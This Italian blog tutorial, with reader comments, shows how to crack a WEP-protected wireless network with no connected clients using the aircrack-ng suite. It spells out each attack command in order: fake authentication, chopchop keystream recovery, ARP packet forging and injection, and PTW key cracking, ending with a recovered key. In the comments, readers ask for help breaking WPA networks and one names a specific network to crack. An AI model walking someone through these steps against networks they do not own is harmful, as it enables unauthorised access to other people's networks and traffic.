Video tutorial su come decriptare una rete wireless protetta

COME BYPASSARE UNA PROTEZIONE WEP SENZA CLIENT CONNESSI

BackTrack 3 Security Suite

Distro BackTrack 3 Security Suite

Nel tutorial che vedremo tra breve cercheremo di capire quanto è importante criptare la propria rete e soprattutto testarne la sicurezza. Già da moltissimo tempo il protocollo WEP usato per criptare le reti è stato abbandonato quasi da tutti gli utilizzatori a favore del ben più robusto WPA/WPA2. Ad onor del vero anche una rete Wireless con cript WPA potrebbe essere violata, ma solo se la chiave da voi scelta è “debole“. Questo perchè l’unico modo per violare una WPA è tramite BRUTE FORCE o un termine da DIZIONARIO. Un esempio pratico, se una rete Wireless in WPA fosse protetta con una password tipo “ASTRONAUTA” sarebbe un gioco da ragazzi per Aircrack scoprire tale password, mentre sarà IMPOSSIBILE per una password tipo MARIO68M23H502C_”%!!”==(, tale password infatti sarebbe immune da attacco tramite DIZIONARIO e soprattutto con attacco BRUTE FORCE.

Le regole da seguire sono semplicissime, password più lunga possibile e senza senso compiuto, possibilmente mischiando numeri e caratteri speciali. Nella password fatta sopra come esempio notiamo un nome,con parte di codice fiscale e data di nascita scritta con lo SHIFT PREMUTO “”!!”!)/” che equivale a 22111972. Mentre questo scritto sopra vale per una rete criptata con WPA la stessa cosa non vale per una rete criptata in WEP, difatti anche scegliendo una password complicatissima con questo protocollo, la metteremo in chiaro in meno di 10 minuti con l’esempio che farò più avanti nell’ articolo.

Consiglio di vedere il tutorial e poi continuare a leggere l’articolo.

Nel video tutorial ho usato la distro Ubuntu con la suite di Aircrack-ng mentre potrete fare i vostri esperimenti scaricando la DISTRO LIVE per eccellenza la BACKTRACK 3 una suite per testare la sicurezza di sistemi informatici.

In realtà la suite di Aircrack non è ad esclusiva delle distribuzioni Linux, ma esiste anche lo stesso software  per Windows,  ma l’efficacia dei sistemi Linux non ha paragoni. C’è anche un software chiamato ERW2.4 (Estudio de redes Wireless 2.4) che in realtà è un programma che sfrutta i comandi della suite di Aircrack-ng, in modo automatico senza digitarli da console. Se da una parte è utile a chi ha poca dimestichezza con le console di Windows, dall’altro l’uso può essere limitato e poco customizzabile, faccio un esempio pratico:

col bottone CAPTURA DE PAQUETES ERW2.4 non fa altro che mandare in esecuzione il comando AIRODUMP-NG –channel XX  –BSSID XX:XX:XX:XX:XX:XX etc etc con INYECCION il comando AIREPLAY-NG e così via. Ma come vedremo la suite di Aircrack-ng è talmente “complessa” e ricca di parametri che usare software come ERW2.4 potrà risultare limitativo (ma comunque funzionale anche per il nostro esempio!). In futuro posterò un tutorial per spiegare il software ERW2.4, per ora Ii mio consiglio  è quello di usare una distro come BackTrack 3 e non Windows.

L’esempio che ho mostrato nel video mostra un access point con SSID linformazione e cript WEP/Open. Innanzitutto per decriptare una rete in WEP o WPA c’è bisogno sempre di traffico, e come fare se di traffico non ce n’è? Semplice ci autentichiamo sulla rete e creiamo noi il traffico.

Innanzitutto verifichiamo che possiamo fare injection (spedire pacchetti all’access point o router) con il comando aireplay -9 ath2 sostituite ath2 con l’identificativo della vostra scheda di rete che vedrete col comando iwconfig (solitamente eth1, ath0, wlan0).

Quando siamo sicuri che l’ injection funzioni a dovere e possiamo così comunicare con l’AP o il Router apriamo un terminale e scriviamo:

airodump-ng –bssid MAC_AP –channel 11 –write linformazione2 ath2

  • – bssid MAC_AP filtra solo il traffico da questo access point, qui dovete mettere il mac address
  • – channel 11 ascoltiamo solo il canale 11 che è lo stesso dell’access point su cui fare l’esperimento
  • – write linformazione2 è il file con il log che andremo a creare
  • ath2 è la nostra scheda di rete wireless in monitor mode.
Airodump-ng
Airodump-ng

Airodump-ng dovrà rimanere in esecuzione per tutta la durata del tutorial, nella foto sopra stiamo mandando in esecuzione il comando con i relativi parametri, e la foto sotto l’inizio dello sniffing della rete (access point in questo caso).

airodump in azione
airodump-ng in azione

Nella foto sopra si può notare che non ci sono Client connessi all’access point e senza traffico non potremmo mai eseguire un cracking della chiave WEP. Per vedere se in una rete c’è traffico il parametro da controllare è il “Data” ma senza client connessi un access point non creerà di certo traffico. Quindi cosa fare? Semplice, il prossimo passo sarà quello di effettuare una falsa autenticazione, tramite la nostra scheda di rete wireless che andrà a buon fine solo nel caso in cui l’ AP accolga richieste di associazione di tipo “OPEN”, nel caso in cui invece l’access point sia configurato per l’autenticazione tramite PSK (Pre Shared Key) il tentativo di falsa autenticazione non andrà a buon fine ( ma è possibile farlo in un altro modo che però non spiegheremo in questo tutorial ).

Per cercare di effettuare l’autenticazione con l’AP useremo il comando Aireplay-ng

aireplay-ng -1 0 -e NOME_SSID -a MAC_AP -h MAC_CLIENT ath2

  • -1 0 è l’opzione di aireplay che specifica la falsa autenticazione
  • -e NOME_SSID specifica l’SSID o nome della rete dell AP (linformazione nel tutorial)
  • -a MAC_AP è il mac address dell’Access Point
  • -h MAC_CLIENT è il mac address della nostra scheda di rete wireless
  • ath2 la nostra interfaccia di rete wireless

Se l’operazione avrà successo otterremo nella shell di aireplay-ng una risposta come nella foto in basso nel riquadro rosso:

Aireplay e falsa autenticazione
Aireplay e falsa autenticazione

In caso contrario non dovessimo ricevere nessuna risposta dalla shell di Aireplay, con un messaggio del tipo:

20:21:55 waiting for beacom frame (BSSID: XX:XX:XX:XX:XX:XX) on channel 11,

bloccare il task con CTRL+C e ripetere l’operazione, questo può accadere se ad esempio ci troviamo lontani dall’access point oppure che abbiamo un segnale debole. Nella foto in alto se ci fate caso, nella shell di airodump-ng ed evidenziato in giallo, siamo riusciti ad autenticarci con la nostra scheda di rete wireless. Ora possiamo interagire con l’access point e creare traffico così da poter catturare quanti più IVS possibili (DATA).

Ora che siamo autenticati passiamo all’attacco vero e proprio al protocollo WEP aprimo o usiamo la schell di prima e sempre con aireplay digitiamo:

aireplay-ng -4 -h MAC_CLIENT -B MAC_AP ath2

  • -4 indica il tipo di attacco, in questo frangente il “koreK chopchop
  • -h MAC_CLIENT è il mac address della nostra scheda di rete usata per la falsa autenticazione
  • -b MAC_AP è il mac address dell’ AP
  • ath2 è la nostra interfaccia di rete

Questo tipo di attacco è molto efficace in quanto tutti i pacchetti che verranno inviati da aireplay-ng per determinare il keystream di un pacchetto wep, saranno inviati tenendo conto come source MAC quello specificato nell’opzione “-h” e cioè quello della nostra scheda di rete con cui abbiamo effettuato una fake auth (falsa autenticazione). Ovviamente se così non fosse l’AP respingerebbe tutti i pacchetti poichè non ne risonosce la provenienza (che in questo caso è il mac address della nostra scheda).

Aireplay-ng dopo qualche secondo (o dipendente dalla velocità con sui si scambiano pacchetti), ci ridarà come risultato una cosa del genere:

Aireplay ha catturato un pacchetto
Aireplay ha catturato un pacchetto

ebbene a questo punto aireplay ha catturato un pacchetto, controlliamo che sia superiore a 68 byte altrimenti potremmo non avere abbastanza dati per generare il keystream. Generalmente più grande è un pacchetto e meglio è, quando aireplay ci chiede di utilizzare il pacchetto rispondiamo con “y”.

A questo punto aireplay sta generando l’attacco creando il pacchetto .XOR che utilizzeremo tra un po. Guardiamo infatti cosa succede nella finestra in basso durante la creazione del pacchetto, nella shell di airodump-ng la nostra scheda di rete sta generando DATA:

La fake auth comincia a creare data
La fake auth comincia a creare data

Una volta terminato questo passaggio ci ritroveremo 3 nuovi file, il pacchetto catturato all’inizio, 1 pacchetto .XOR contenente il keystream e 1 pacchetto WEP in chiaro.

Il pacchetto .XOR è quello che ci serve per creare la richiesta ARP da iniettare nella rete e generare pacchetti utile come detto in precedenza per craccare la chiave WEP.

Ora dobbiamo “forgiare” il pacchetto da iniettare, in questo caso aprimo la shell ed usiamo il comando packetforge-ng:

packetforge-ng -0 -a MAC_AP -h MAC_CLIENT -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-xxxx-xxxxxx.XOR -w pacchettoforgiato.cap

  • -0 significa che vogliamo creare un pacchetto ARP
  • -a MAC_AP è il mac address dell’access point
  • -h MAC_CLIENT è il nostro mac address con cui abbiamo effettuato la fake auth
  • -k 255.255.255.255 è l’indirizzo ip di destinazione
  • -l (elle) 255.255.255.255 è l’indirizzo ip sorgente
  • -y replay_dec-xxx-xxxxx.xor è il file che abbiamo appena creato contenente il keystream
  • -w pacchettoforgiato.cap è il nome del file output che genererà packetforge.

una volta eseguito packetforge, ci serviremo nuovamente di aireplay-ng per iniettare il pacchetto appena creato con il comando di seguito:

aireplay-ng -2 -r pacchettoforgiato.cap ath2

  • -2 indica il tipo di attacco interattivo
  • -r pacchettoforgiato.cap specifica il file che abbiamo intenzione di iniettare
  • ath2 è la nostra scheda di rete

A questo punto l’access point e la nostra scheda di rete stanno creando una media di 200-300 IVS al secondo, come dimostrato dal video e dalla foto in basso:

Packeforge ha forgiato il pacchetto
Packeforge ha forgiato il pacchetto

Non ci resta che attendere un ragionevole numero di pacchetti per eseguire aircrack-ng e decriptare la chiave WEP. Solitamente con una media di 50.000 IVS dovremmo trovare la chiave, per sicurezza catturiamone almeno 100.000 in modo da decriptare una chiave wep a 128bit con un’altissima probabilità di successo. E’ possibile comunque lasciare airodump che sta generando pacchetti mentre mandiamo in esecuzione aircrack-ng.

Vediamo come:

aircrack-ng – z -b MAC_AP linformazione*.cap

  • -z il tipo di attacco (PTW)
  • -b MAC_AP il mnac address dell’ AP
  • linformazione*.cap è il file che abbiamo specificato all’inizio dove airodump-ng sta salvando il traffico sniffato fino ad ora.

L’attacco PTW è un nuovo attacco che ci permette di decriptare con pochi IVS la chiave WEP, in precedenza infatti servivano almeno 2.000.000 di pacchetti per decifrare una chiave WEP a 128Bit.

il risultato sotto, aircrack-ng in azione mentre ha trovato la chiave WEP in pochissimi secondi:

Ascii= mario57&5543

Hex= 606172696E6F35372635353433

Aircrack-ng trova la chiave WEP
Aircrack-ng trova la chiave WEP

In un prossimo articolo vedremo un attacco su una rete criptata in WPA/PSK.

8 Responses to Video tutorial su come decriptare una rete wireless protetta

  1. battiz scrive:

    “In un prossimo articolo vedremo un attacco su una rete criptata in WPA/PSK.”
    … a quando? l’hai gia’ scritto?
    perche’ non lo linki alla parte finale di questo articolo ?😉

    ciao e ottima guida, credo la migliore tra tutte quelle niubbe che ho trovato in giro!

  2. battiz scrive:

    … nel senso niubbe le altre non la tua
    si capisce che hai approfondito andando oltre il semplice utilizzo della pappa pronta aircrack😉

  3. hunte88 scrive:

    davvero un ottima guida…..unico problema a me in ogni caso genera un numero di pacchetti data motlo basso tipo in 18 minuti ha scaricato circa 100 data……questo con la procedura eseguita qui….senza di questa resumo anzi ho visto che ci mette molto di iù.

    C’è un modo per rendere piu veloce questa cosa ?

    Ho notato fra l’altro che di fianco a dove c’e scritto beacons…data c’è il simbolo #/s che nella guida sono zero solo all’inizio poi dopo crescono anche quelli…a me invece resta sempre zero……..

    aiutoooooooooooo

  4. renato scrive:

    ottima guida, pero con me non funziona…non so perche..
    uso ubuntu8.04.01 con kernel 2.6.24-19, dovrei gia avere i driver wflwifi pero quando tento di usare airreplay mi si bloccacompletamente ubuntu e sono costretto ad riavviaRE.
    qualche soluzione????
    grazie

  5. Chrisitan scrive:

    Ciao non so il tuo nome ma mi farebbe piacere conoscere il segrreto per decriptare una rete wirelles wpa xchè fino ad oggi ancora non ci sono riuscito ti ho lasciato il mio indirizzo email mi fa piacere se mi contatti e mi dai delle diritte x craccere reti wirelles
    GRAZIE IN ANTICIPO CHRISTIAN

  6. Chrisitan scrive:

    COSO MAI NO TI ARRIVA IL MIO INDIRIZZO è CHRISTIANFREE@HOTMAIL.IT

  7. Marco Break scrive:

    Ragazzi funziona provato e testato o mostr

  8. calaiò scrive:

    mi aiutereste a trovare la password di: FASTWEB-1-t6CLMVxZo5Zr

Lascia un commento

Inserisci i tuoi dati qui sotto o clicca su un'icona per effettuare l'accesso:

Logo WordPress.com

Stai commentando usando il tuo account WordPress.com. Chiudi sessione / Modifica )

Foto Twitter

Stai commentando usando il tuo account Twitter. Chiudi sessione / Modifica )

Foto di Facebook

Stai commentando usando il tuo account Facebook. Chiudi sessione / Modifica )

Google+ photo

Stai commentando usando il tuo account Google+. Chiudi sessione / Modifica )

Connessione a %s...

%d blogger cliccano Mi Piace per questo: